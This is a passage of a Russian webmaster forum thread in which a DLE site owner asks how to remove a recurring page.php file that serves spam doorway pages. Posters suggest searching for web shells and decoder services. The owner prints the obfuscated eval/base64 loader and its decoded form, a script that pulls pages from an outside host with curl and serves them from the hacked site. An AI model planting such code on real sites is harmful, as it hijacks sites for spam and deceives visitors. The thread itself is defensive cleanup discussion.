Файл page.php в корне DLE создает левые страницы

123
R
На сайте с 24.01.2008
Offline
180
#11
Le0n13:
Удаляю, но через день он снова появляется!!!))) (даже если сменить пароль на фтп)

ТС вам залил дОров, ищите шеллы, смена паролей вам не поможет.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
trahtor
На сайте с 06.12.2005
Offline
426
#12
Rxp:
ТС вам залил дров

Чочо? Я твой труба шатал, не?

L0
На сайте с 10.06.2010
Offline
86
#13

ищем, никак не можем найти! ) может кто подскажет где в ДЛЕ еще они могут прятаться? (uploads и templates проверили вроде норм) и большую часть на что ругался айболит тоже проверили, все чисто...

Правда экономит время...
allleXX77
На сайте с 31.10.2010
Offline
94
#14

Попробуйти найти файлы с именами типа security.php, img.php, htaccess.php и тому подобные названия файлов, которые вы бы не заметили или побоялись удалить

L0
На сайте с 10.06.2010
Offline
86
#15

Смотрели, ничего подобного нету. Единстенный подозрительный файл это page.php, через который и происходит это все... может кто поможет его расшифровать?

Вот его первые строки:

<?php

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZm5juTKFUR9Ae8fBoMxJOeBZG4kBvqTclibJVvozxdv5AkmpyQM9IxCV3HJvGtE3OwfX4/34/nt25///Pb99tWm47Pcvmo5Pu32Vd7jd9yrj+MzH5/Ury3r8TnuL8dzy.....

atranca
На сайте с 27.02.2011
Offline
126
#16
Le0n13:
ищем, никак не можем найти! ) может кто подскажет где в ДЛЕ еще они могут прятаться? (uploads и templates проверили вроде норм) и большую часть на что ругался айболит тоже проверили, все чисто...

смотрите по дате модификации файлов. (хотя ее тоже часто правят). И еще- правильно настроенные права на файлы и папки- спасают от правки файлов (есть такое понятие как шел с порезанными правами - они никому не интересны).

123
SM
На сайте с 19.02.2013
Offline
7
#17

а отправьте и мне файл page.php глянуть вдруг че найду

hungry_studentСРАБАКАukr.net

DM
На сайте с 17.01.2009
Offline
42
#18
Le0n13:
Смотрели, ничего подобного нету. Единстенный подозрительный файл это page.php, через который и происходит это все... может кто поможет его расшифровать?

Вот его первые строки:
<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZm5juTKFUR9Ae8fBoMxJOeBZG4kBvqTclibJVvozxdv5AkmpyQM9IxCV3HJvGtE3OwfX4/34/nt25///Pb99tWm47Pcvmo5Pu32Vd7jd9yrj+MzH5/Ury3r8TnuL8dzy.....

Полно же сервисов :)

http://www.unphp.net/

http://ddecode.com/phpdecoder/

и т.п.

allleXX77
На сайте с 31.10.2010
Offline
94
#19

расшифровка этого файла вам ничего не даст, там грубо говоря инструкция откуда тянуть доры.. а вам нужно найти шелл снести его и залатать дырки в системе

L0
На сайте с 10.06.2010
Offline
86
#20
DzenM:
Полно же сервисов :)
http://www.unphp.net/
http://ddecode.com/phpdecoder/
и т.п.

Спасибо, помогли с расшифровкой!!))

А вот что в этом самом файле page.php, в индес.пхп смотрел, вроде все чисто. Искал подобные операторы в разных файлах, ниче нигде нету) Может кто еще чтото подскажет? :)

<?php ?><?php

error_reporting(0);

$get = 'post'; // http://site.ru/?dor= dor

$charset = 'windows-1251';

if (isset($_GET[$get])) {

if (empty($_GET[$get])) $name = 'index.php';

else $name = $_GET[$get];

//================settings=======================//

$defaultType = "text/html; charset=$charset";

$fileType = array("css" => "text/css; charset=$charset", "png" => "image/png", "jpg" => "image/jpeg", "jpeg" => "image/jpeg", "gif" => "image/gif", "js" => "text/javascript", "xml" => "text/xml",);

$dor_host = 'http://rokpok.ru/files/' . str_replace('www.', '', $_SERVER[SERVER_NAME]);

//===============================================//

$f1 = strrpos($name, ".");
$f2 = substr($name, $f1 + 1, 999);
$fileRas = strtolower($f2);
$filename = $dor_host . '/' . $name;
$file = file($filename);
$type = array_key_exists($fileRas, $fileType) ? $fileType[$fileRas] : $defaultType;
header("Content-Type: $type");
if ($file) {
$html = implode('', $file);
echo $html;
exit;
} elseif (extension_loaded('curl')) {
$ch = curl_init();
$url_string = $dor_host . '/' . $name;
curl_setopt($ch, CURLOPT_URL, $url_string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$html = curl_exec($ch);
curl_close($ch);
if ($html) {
echo $html;
} else {
header("Status: 404 Not Found");
echo 'PAGE NOT FOUND';
}
exit;
} else {
header("Status: 404 Not Found");
echo 'PAGE NOT FOUND';
}
exit;
}
?>

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий